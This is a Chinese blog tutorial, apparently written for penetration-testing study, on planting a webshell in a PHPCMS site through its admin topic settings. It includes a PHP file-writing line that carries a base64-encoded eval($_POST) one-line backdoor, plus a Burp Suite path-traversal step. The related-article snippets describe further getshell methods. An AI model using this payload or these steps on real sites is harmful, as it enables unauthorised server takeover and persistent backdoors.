PHPcms框架的Webshell

已于 2022-04-02 09:59:13 修改
阅读量234 收藏
点赞数
分类专栏: # 网站webshell 文章标签: mysql php 数据库
于 2022-04-02 09:58:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854662/article/details/123913676
版权
本文详细讲述了如何通过登录PHP CMS后台,利用代码注入获取webshell,随后通过burpsuit拦截实现一句话木马植入,并在专题设置中进行巧妙操作。最后介绍了如何通过蚁剑连接获取并执行生成的文件。
摘要由CSDN通过智能技术生成

登录界面

后台网址

www.phpcms.com/admin.php

进入主页面

在这里插入图片描述

代码注入拿webshell

接下来 我直接就上图了

在这里插入图片描述

在这里插入图片描述

写入一句话木马

<?php file_put_contents('ooo.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUW2FhXSk7Pz4=')); ?>

查看专题
在这里插入图片描述
继续添加第二个专题
在这里插入图片描述

利用burpsuit拦截将代码写入,意思是将专题dayu2-扩展设置-专题首页里的index写入代码调用专题ooo1中的一句话生成一句话文件

在这里插入图片描述
抓包将index除替换:…/…/…/…/html/special/ooo1/index
在这里插入图片描述

查看专题 创建成功
在这里插入图片描述
利用蚁剑连接一句话 即可

zxl2605
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透之路 思路【第一篇】get webshell总结
dfu65065的博客
09-22 517
CMS获取Webshell方法 主要通过百度搜索CMS网站程序名称。如:phpcmsWebshell、WordPress后台拿Webshell等 非CMS获取Webshell方法 1、数据库备份获取Webshell 原理:后台文件重命名(e.g xxx.jpg-> xxx.asp) 2、抓包上传获取Webshell 文件上传 3、Sql命令获取We...
122.网络安全渗透测试—[CMS后台 getwebshell]—[phpcms9.6后台 getwebshell]
qwsn
07-10 2516
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 登录后台---->内容---->专题---->添加专题—>专题名称、横幅、缩略图、子分类、分类路径随便填---->目录填为wshell(功能是在默认目录下生成/html/special/wshell/index.php)---->导读内容填以下内容:(其中base64解码为) 再次添加spark专题---->内容随便填---->BurpSuite拦截...
【转】详解:利用PHPCMS V9漏洞入侵网站取得webshell权限
cc1988429的专栏
10-12 7141
考虑到本文涉及到的v9漏洞已公布很长时间,并且官方早已给出补丁,对绝大部分站点影响已经很小,湛蓝特将此方法发布与大家分享学习,此方法可取得目标站点webshell权限,上传任意木马控制站点。 湛蓝天空 声明:本方法具有很强针对攻击性,目的是让大家了解黑客利用开源系统PHPCMS V9漏洞入侵网站,取得webshell权限并添加持久锚链接的一般流程。请勿对任何漏洞站点进行测试
phpcms框架自创捐赠模块
02-20
phpcms框架底层代码修改,在学习订单框架基础上,自创捐赠模块
phpcms框架订单模块安装完全版
02-10
**phpcms框架订单模块安装完全版** 在PHP开发领域,phpcms是一款广泛应用的内容管理系统框架,以其灵活、可扩展性著称。本教程将详细介绍如何在phpcms框架中安装并配置订单模块,以便实现商品订单的显示功能。 ...
phpcms WebUploader上传移除flash
05-13
PHPCMS作为一款广泛使用的网站内容管理系统,也面临着更新技术以适应现代浏览器需求的挑战。"phpcms WebUploader上传移除flash"的主题正是针对这一需求,将原有的基于Flash的上传方式替换为HTML5的上传机制,以提供...
PHPCMS后台模板 美化PHPCMS后台
11-27
3. **phpcms** - 这同样可能是一个目录,通常存放PHPCMS的核心框架文件,包括模型、库函数、配置文件等。尽管直接修改这部分可能涉及较大改动,但若需要深入定制,了解并可能调整这部分代码是必要的。 4. **statics...
phpcms.zip
05-12
已修改 : /phpcms/libs/classes/checkcode.class.php 已修改 : /phpcms/libs/classes/db_factory.class.php 已增加 : /phpcms/libs/classes/db_mysqli.class.php 已修改 : /phpcms/libs/classes/model.class.php 已...
如何解决phpcms V9后台拿shell时出错问题
09-29
很多新手朋友都遇到过phpcms V9后台拿shell时出错,下面为大家介绍个不错的解决方法,希望对大家有所帮助
PHPCMS-2008远程代码执行1
08-03
PHPCMS-2008远程代码执行1
TIPS:Phpcmd2008 GetWebShell
weixin_34037977的博客
12-17 87
http://www.xxx.com/admin.php?mod=phpcms&file=safe&action=see_code&files=test.php 直接在文件源代码里入***后,点修改就可以了,test.php马就在根目录下了 转载于:https://blog.51cto.com/pnig0s1992/458406...
Webshell总结
qq_39345447的博客
04-09 719
命令执行漏洞 命令执行直接调用操作系统命令。其原理是,在操作系统中,“&、|、||”都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户输入的情况下,造成命令执行漏洞。 command1&command2 两个命令同时执行 command1&&command2 ...
获取Webshell方法总结
Au
12-03 3529
本文主要在思路方面进行汇众,具体技术不讨论~ 主要分为3大类 一、CMS获取webshell 二、非CMS获取webshell 三、其他方式获取webshell   CMS获取webshell 通过百度、google等搜索引擎进行搜索,查询CMS网站程序名称。 例如phpcmswebshell,wordpress后台getshell等   非CMS获取webshell ...
phpcms v9.6.0版本getshell测试
黑面狐
09-09 4876
其实这个漏洞是4月初的时候了。 今天有空重新记录一下。 一、环境搭建: 需要 phpcms V9.6.0安装包/ phpstudy 安装PHPstudy完成后,直接把phpcms V9.6.0解压到WWW目录下 然后浏览器访问:http://ip/phpcms 进行安装,安装都是傻瓜式的操作,填数据库用户名密码就可以了。。phpstudy的mysql数据库root密码默认为root
phpshell,phpcms怎么拿shell
weixin_33450988的博客
03-10 447
phpcmsshell的方法:首先登录phpcms后台管理;然后依次点击“界面”->“模板风格”,并点击“详细列表”;接着点击“search”文件夹;最后修改“index.html”,并点击“可视化”即可。记一次phpcms v9后台拿shell过程登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图:然后点击 search 这个文件夹,如下图:然后点击修改 index.htm...
phpcms框架语法
lmy1998的博客
08-20 171
//获取一级导航 {pc:content action="category" catid="0" num="25" siteid="$siteid" order="listorder ASC"} <ul class="total-tab-ul clearfix"> <li class="total-tab-list {if !$catid}active-tab{/if}"><a href="{siteurl($siteid)}"><span&...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值